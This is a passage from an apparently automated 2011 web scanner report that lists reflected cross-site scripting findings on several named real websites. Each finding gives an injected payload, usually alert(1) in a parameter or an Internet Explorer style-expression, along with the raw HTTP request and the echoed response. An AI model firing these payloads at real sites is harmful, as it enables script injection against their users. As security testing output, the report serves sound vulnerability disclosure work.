5.179. http://west.thomson.com/support/contact-us/default.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://west.thomson.com
Path:
/support/contact-us/default.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fdea"style%3d"x%3aexpression(alert(1))"22c4a465138 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8fdea"style="x:expression(alert(1))"22c4a465138 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the FindingMethod request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54b8b"%3balert(1)//787512fed9c was submitted in the FindingMethod parameter. This input was echoed as 54b8b";alert(1)//787512fed9c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the PromCode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 749d9"%3balert(1)//72d68614b4 was submitted in the PromCode parameter. This input was echoed as 749d9";alert(1)//72d68614b4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
5.182. https://west.thomson.com/support/customer-service/order-info.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://west.thomson.com
Path:
/support/customer-service/order-info.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8613a"style%3d"x%3aexpression(alert(1))"bb1d1f56e32 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8613a"style="x:expression(alert(1))"bb1d1f56e32 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 2ebca<script>alert(1)</script>6a2cf77656a was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /widget/Matrix2.do?domain=us-festivals&mode=concise&lat=25.7933333&long=-80.290556&startDate=4/30/2011&endDate=5/18/2011&callback=itandlEventsCallback2ebca<script>alert(1)</script>6a2cf77656a HTTP/1.1 Host: widget.needle.itasoftware.com Proxy-Connection: keep-alive Referer: http://matrix.itasoftware.com/view/details?session=9dec83c4-0dea-4ecc-8e10-94096c69ac61 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=269716137.1303847753.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269716137.2091474344.1303847753.1303847753.1303847753.1; __utmc=269716137; __utmb=269716137.13.10.1303847753; JSESSIONID=1AA23091BF71FF338221489D9F6C0ECD.ita1needle6-reader
itandlEventsCallback2ebca<script>alert(1)</script>6a2cf77656a({"results":[["The 16th Annual National Children\'s Theatre Festival","16th annual national childrens theatre festival the",[[["Actors\' Playhouse at the Miracle Theatre","actors playhouse at the mirac ...[SNIP]...
The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 67881<script>alert(1)</script>d4ca36e90c2 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /buttons/count?url=http%3A//xss.cx/2011/04/26/dork/reflected-xss-cross-site-scripting-cwe79-capec86-ghdb-shotssnapcom.html67881<script>alert(1)</script>d4ca36e90c2 HTTP/1.1 Host: widgets.digg.com Proxy-Connection: keep-alive Referer: http://xss.cx/2011/04/26/dork/reflected-xss-cross-site-scripting-cwe79-capec86-ghdb-shotssnapcom.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the panelId request parameter is copied into the HTML document as plain text between tags. The payload d0616<script>alert(1)</script>374cd424dc0 was submitted in the panelId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /syndication/subscriber/InsertPanel.js?panelId=0ed14c91-dfd4-497f-b04b-3d371abe7a5ed0616<script>alert(1)</script>374cd424dc0 HTTP/1.1 Host: widgetserver.com Proxy-Connection: keep-alive Referer: http://www.widgetbox.com/list/most_popular User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 21:46:17 GMT Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Connection: close Content-Type: application/x-javascript;charset=UTF-8 Content-Length: 6119
function libReadyCallback() { var parent_node = document.getElementById(parentNodeId); WIDGETBOX.subscriber.Main.insertPanel("0ed14c91-dfd4-497f-b04b-3d371abe7a5ed0616<script>alert(1)</script>374cd424dc0", parent_node); }
The value of the 980251%22';944334 request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5aa12(a)acca7f1048c was submitted in the 980251%22';944334 parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /?980251%22';9443345aa12(a)acca7f1048c HTTP/1.1 Host: www.allpages.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
5.187. http://www.allpages.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.allpages.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 84a26(a)d3d1371b61f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /?980251%22';944334&84a26(a)d3d1371b61f=1 HTTP/1.1 Host: www.allpages.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the channel request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68743"%3balert(1)//bb61ffcaafd was submitted in the channel parameter. This input was echoed as 68743";alert(1)//bb61ffcaafd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr68743"%3balert(1)//bb61ffcaafd&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the classification request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86e94"%3balert(1)//5616609a231 was submitted in the classification parameter. This input was echoed as 86e94";alert(1)//5616609a231 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply86e94"%3balert(1)//5616609a231&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca ...[SNIP]... 7_9_95&pvp_campaign_int=&level_education=&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply86e94";alert(1)//5616609a231&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=®istered_nurse=&mvtkey=");
The value of the creative_desc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d075"%3balert(1)//51083a8fbe0 was submitted in the creative_desc parameter. This input was echoed as 7d075";alert(1)//51083a8fbe0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf7d075"%3balert(1)//51083a8fbe0&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the creative_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6605f"%3balert(1)//45adfdbe294 was submitted in the creative_id parameter. This input was echoed as 6605f";alert(1)//45adfdbe294 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=389543536605f"%3balert(1)//45adfdbe294&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b0ef"%3balert(1)//b7cd0810838 was submitted in the destination parameter. This input was echoed as 6b0ef";alert(1)//b7cd0810838 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm6b0ef"%3balert(1)//b7cd0810838&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca ...[SNIP]... gn_int=&level_education=&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm6b0ef";alert(1)//b7cd0810838&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=®istered_nurse=no&mvtkey=");
The value of the distribution request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff562"%3balert(1)//f7e8dbd9af9 was submitted in the distribution parameter. This input was echoed as ff562";alert(1)//f7e8dbd9af9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targff562"%3balert(1)//f7e8dbd9af9&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca ...[SNIP]... &foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targff562";alert(1)//f7e8dbd9af9&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=®istered_nurse=&mvtkey=");
setAllowDestURLOnSubmit(true);
/* an_arr's params * 0 - poid * 1 - redirect href * 2 - has popped up ...[SNIP]...
The value of the initiative request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35a6c"%3balert(1)//51687862cc2 was submitted in the initiative parameter. This input was echoed as 35a6c";alert(1)//51687862cc2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen35a6c"%3balert(1)//51687862cc2&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca ...[SNIP]... e=&program_type=&program_type2=&pvp_campaign=14610_0957_9_95&pvp_campaign_int=&level_education=&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen35a6c";alert(1)//51687862cc2&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=®istered_nurse=no&mvtkey=");
The value of the keyword request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5bc8"%3balert(1)//cf689d3bc25 was submitted in the keyword parameter. This input was echoed as b5bc8";alert(1)//cf689d3bc25 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006b5bc8"%3balert(1)//cf689d3bc25&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca ...[SNIP]... Net/hhs?pid=62A1E89CCBA3FB2D&pvp_design=&kw=&kw=&channel=banr&category=&psrc=&psrc_url=&vrefid=&creative_id=38954353&creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&keyword=msn_careers_728x90_425006b5bc8";alert(1)//cf689d3bc25&v1=aptm&v2=&v3=&v4=&v5=&v6=&v7=&v8=&country_codes=&country=&salutation=&first_name=&last_name=&email_address=&address=&address_2=&city=&state=&postal_code_int=&postal_code=&program_type=&program_type2 ...[SNIP]...
The value of the mktg_prog request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fe23"%3balert(1)//02c8aa1a94a was submitted in the mktg_prog parameter. This input was echoed as 5fe23";alert(1)//02c8aa1a94a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen5fe23"%3balert(1)//02c8aa1a94a&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca ...[SNIP]... e=&program_type2=&pvp_campaign=14610_0957_9_95&pvp_campaign_int=&level_education=&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen5fe23";alert(1)//02c8aa1a94a&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=®istered_nurse=&mvtkey=");
The value of the provider request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0f7a"%3balert(1)//300fb6cc037 was submitted in the provider parameter. This input was echoed as a0f7a";alert(1)//300fb6cc037 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSNa0f7a"%3balert(1)//300fb6cc037&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca ...[SNIP]... int=&postal_code=&program_type=&program_type2=&pvp_campaign=14610_0957_9_95&pvp_campaign_int=&level_education=&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSNa0f7a";alert(1)//300fb6cc037&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=®istered_nurse=no&mvtkey=D55602 ...[SNIP]...
The value of the pvp_campaign request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 937af"%3balert(1)//10c054b4a93 was submitted in the pvp_campaign parameter. This input was echoed as 937af";alert(1)//10c054b4a93 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
